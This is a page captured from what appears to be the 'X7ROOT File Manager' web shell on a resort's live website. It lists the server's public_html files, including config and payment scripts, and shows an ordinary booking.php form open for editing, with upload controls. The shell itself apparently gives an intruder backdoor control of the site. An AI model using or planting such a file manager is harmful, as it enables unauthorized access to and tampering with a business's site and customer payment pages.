X7ROOT File Manager
Current Path:
/home/u126090504/domains/oceanicabeachresort.com/public_html
home
/
u126090504
/
domains
/
oceanicabeachresort.com
/
public_html
/
📁
..
📄
.htaccess
(0 B)
📁
Version
📄
about.php
(4.19 KB)
📁
admin
📁
assets
📄
booking.php
(4.55 KB)
📄
booking_details.php
(4.43 KB)
📄
booking_process.php
(1.12 KB)
📄
config.php
(914 B)
📄
contact.php
(14.48 KB)
📄
contactdb.php
(796 B)
📄
footer.php
(13.26 KB)
📄
gallery.php
(2.82 KB)
📄
header.php
(19.3 KB)
📁
images
📄
index.php
(2.27 KB)
📄
indexx.php
(75.25 KB)
📁
lib
📄
oce.zip
(106.17 MB)
📄
payment.php
(6.79 KB)
📄
payment_submit.php
(15.1 KB)
📄
payment_verify.php
(2.31 KB)
📄
peret.php
(266.87 KB)
📁
qrcodes
📄
room-service.php
(8.98 KB)
📄
search_videos.php
(1.76 KB)
📄
services.php
(14.04 KB)
📄
success.php
(2.06 KB)
📄
test_mailer.php
(372 B)
📄
thank-you.php
(1.28 KB)
📁
uploads
📄
videos.php
(6.87 KB)
Editing: booking.php
<?php require_once 'config.php'; $rooms = mysqli_query($conn,"SELECT * FROM rooms WHERE status='Available'"); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Book Your Stay | Oceanica Beach Resort</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <!-- Flatpickr --> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/flatpickr/dist/flatpickr.min.css"> <!-- Font Awesome --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css"> <style> body{ margin:0; font-family:"Segoe UI", Arial, sans-serif; background:#f4f6f9; } /* PAGE SPACING */ .booking-section-2{ padding:30px 12px 50px; } /* CARD */ .booking-wapper{ background:linear-gradient(180deg,#0b1c2d,#06131f); border-radius:22px; padding:26px 20px 28px; box-shadow:0 25px 55px rgba(0,0,0,.4); max-width:520px; margin:0 auto; } /* FORM */ .booking-form{ display:flex; flex-direction:column; gap:16px; } .form-group{ width:100%; } /* LABEL */ label{ color:#dfe7ef; font-size:14px; margin-bottom:8px; display:block; } /* INPUTS */ .form-control, .form-select{ width:100%; padding:15px 16px; border-radius:16px; border:1px solid #1f3b56; background:#041625; color:#fff; font-size:15px; box-sizing:border-box; } .form-control::placeholder{ color:#9aa6b2; } /* SEARCH BUTTON */ .booking-button-wapper{ display:flex; justify-content:center; margin-top:18px; } .booking-button{ width:64px; height:64px; border-radius:50%; border:none; background:#e6ad22; color:#000; font-size:22px; cursor:pointer; box-shadow:0 12px 28px rgba(230,173,34,.55); } .booking-button:hover{ background:#ffc83d; } /* DESKTOP */ @media(min-width:768px){ .booking-wapper{ max-width:100%; padding:30px; } .booking-form{ flex-direction:row; align-items:flex-end; gap:15px; } .form-group{ flex:1; } .booking-button-wapper{ margin-top:0; } .booking-button{ width:56px; height:56px; } } </style> </head> <body> <section class="booking-section-2"> <div class="container"> <div class="booking-wapper"> <form action="booking_process.php" method="POST" class="booking-form"> <div class="form-group"> <label>Check In</label> <input class="form-control js-date" type="text" name="checkin_date" placeholder="dd-mm-yyyy" readonly required> </div> <div class="form-group"> <label>Check Out</label> <input class="form-control js-date" type="text" name="checkout_date" placeholder="dd-mm-yyyy" readonly required> </div> <div class="form-group"> <label>Room</label> <select class="form-select" name="room_id" required> <option value="">Select Room</option> <?php while($r=mysqli_fetch_assoc($rooms)){ ?> <option value="<?= $r['id'] ?>"> <?= htmlspecialchars($r['room_name']) ?> – ₹<?= number_format($r['price'],2) ?> </option> <?php } ?> </select> </div> <div class="form-group"> <label>Adults</label> <select class="form-select" name="adults" required> <option value="">Select</option> <option value="1">01</option> <option value="2">02</option> </select> </div> <div class="form-group"> <label>Children</label> <select class="form-select" name="children"> <option value="0">00</option> <option value="1">01</option> <option value="2">02</option> </select> </div> <div class="booking-button-wapper"> <button type="submit" class="booking-button"> <i class="fa-solid fa-magnifying-glass"></i> </button> </div> </form> </div> </div> </section> <script src="https://cdn.jsdelivr.net/npm/flatpickr"></script> <script> flatpickr(".js-date", { dateFormat: "d-m-Y", minDate: "today", disableMobile: true }); </script> </body> </html>
Upload File
Create Folder